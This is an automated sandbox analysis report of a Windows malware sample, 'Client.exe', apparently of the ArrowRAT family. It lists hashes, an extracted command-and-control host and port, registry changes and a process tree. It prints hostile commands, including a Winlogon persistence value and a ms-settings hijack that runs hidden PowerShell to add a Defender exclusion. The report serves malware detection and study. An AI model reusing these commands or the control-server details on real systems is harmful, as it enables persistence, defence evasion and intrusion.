Analysis
-
max time kernel
127s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
26-12-2024 16:23
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20240729-en
General
-
Target
Client.exe
-
Size
158KB
-
MD5
b9e38162af37c0f29b683c3c307fae6c
-
SHA1
646eedd6062086bb394c5f5727ff3cfff940e090
-
SHA256
d020ce862bf6ba26a1b4b0ca76ebc2ce9bc5ade16e52c66b11bc4253a16318a7
-
SHA512
85440ad4b1258171ddd280e373b31ea2018538256c21ff024d138f4032bb4717875351073fd987e2c0e120f7dbea5bfc9cf32484224e2c04685a13916b8e44b5
-
SSDEEP
3072:Mbz3H+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPmOO8Y:Mbz3e0ODhTEPgnjuIJzo+PPcfPmB8
Malware Config
Extracted
arrowrat
Client
24.ip.gl.ply.gg:46885
BVCkbzdsT
Signatures
-
Arrowrat family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\Pan\\dora" Client.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings\shell Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\Pan\\dora'" Client.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings\shell\open\command Client.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings Client.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings\shell\open Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute Client.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe 1488 Client.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 1488 Client.exe Token: SeShutdownPrivilege 2892 explorer.exe Token: SeShutdownPrivilege 2892 explorer.exe Token: SeShutdownPrivilege 2892 explorer.exe Token: SeShutdownPrivilege 2892 explorer.exe Token: SeShutdownPrivilege 2892 explorer.exe Token: SeShutdownPrivilege 2892 explorer.exe Token: SeShutdownPrivilege 2892 explorer.exe Token: SeShutdownPrivilege 2892 explorer.exe Token: 33 1616 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1616 AUDIODG.EXE Token: 33 1616 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1616 AUDIODG.EXE Token: SeShutdownPrivilege 2892 explorer.exe Token: SeShutdownPrivilege 2892 explorer.exe Token: SeShutdownPrivilege 2892 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe 2892 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1488 Client.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 1488 wrote to memory of 2892 1488 Client.exe 29 PID 1488 wrote to memory of 2892 1488 Client.exe 29 PID 1488 wrote to memory of 2892 1488 Client.exe 29 PID 2892 wrote to memory of 2712 2892 explorer.exe 31 PID 2892 wrote to memory of 2712 2892 explorer.exe 31 PID 2892 wrote to memory of 2712 2892 explorer.exe 31 PID 1488 wrote to memory of 572 1488 Client.exe 30 PID 1488 wrote to memory of 572 1488 Client.exe 30 PID 1488 wrote to memory of 572 1488 Client.exe 30 PID 1488 wrote to memory of 572 1488 Client.exe 30 PID 1488 wrote to memory of 2824 1488 Client.exe 32 PID 1488 wrote to memory of 2824 1488 Client.exe 32 PID 1488 wrote to memory of 2824 1488 Client.exe 32 PID 1488 wrote to memory of 2824 1488 Client.exe 32 PID 1488 wrote to memory of 2848 1488 Client.exe 33 PID 1488 wrote to memory of 2848 1488 Client.exe 33 PID 1488 wrote to memory of 2848 1488 Client.exe 33 PID 1488 wrote to memory of 2848 1488 Client.exe 33 PID 1488 wrote to memory of 2960 1488 Client.exe 34 PID 1488 wrote to memory of 2960 1488 Client.exe 34 PID 1488 wrote to memory of 2960 1488 Client.exe 34 PID 1488 wrote to memory of 2960 1488 Client.exe 34 PID 1488 wrote to memory of 2756 1488 Client.exe 35 PID 1488 wrote to memory of 2756 1488 Client.exe 35 PID 1488 wrote to memory of 2756 1488 Client.exe 35 PID 1488 wrote to memory of 2756 1488 Client.exe 35 PID 1488 wrote to memory of 2108 1488 Client.exe 36 PID 1488 wrote to memory of 2108 1488 Client.exe 36 PID 1488 wrote to memory of 2108 1488 Client.exe 36 PID 1488 wrote to memory of 2108 1488 Client.exe 36 PID 1488 wrote to memory of 2948 1488 Client.exe 37 PID 1488 wrote to memory of 2948 1488 Client.exe 37 PID 1488 wrote to memory of 2948 1488 Client.exe 37 PID 1488 wrote to memory of 2948 1488 Client.exe 37 PID 1488 wrote to memory of 2736 1488 Client.exe 38 PID 1488 wrote to memory of 2736 1488 Client.exe 38 PID 1488 wrote to memory of 2736 1488 Client.exe 38 PID 1488 wrote to memory of 2736 1488 Client.exe 38 PID 1488 wrote to memory of 2612 1488 Client.exe 39 PID 1488 wrote to memory of 2612 1488 Client.exe 39 PID 1488 wrote to memory of 2612 1488 Client.exe 39 PID 1488 wrote to memory of 2612 1488 Client.exe 39 PID 1488 wrote to memory of 1928 1488 Client.exe 40 PID 1488 wrote to memory of 1928 1488 Client.exe 40 PID 1488 wrote to memory of 1928 1488 Client.exe 40 PID 1488 wrote to memory of 1928 1488 Client.exe 40 PID 1488 wrote to memory of 2628 1488 Client.exe 41 PID 1488 wrote to memory of 2628 1488 Client.exe 41 PID 1488 wrote to memory of 2628 1488 Client.exe 41 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2712
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:572
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2824
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2960
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2756
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2108
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2736
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2612
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:1928
-
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"2⤵PID:2628
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5e41⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616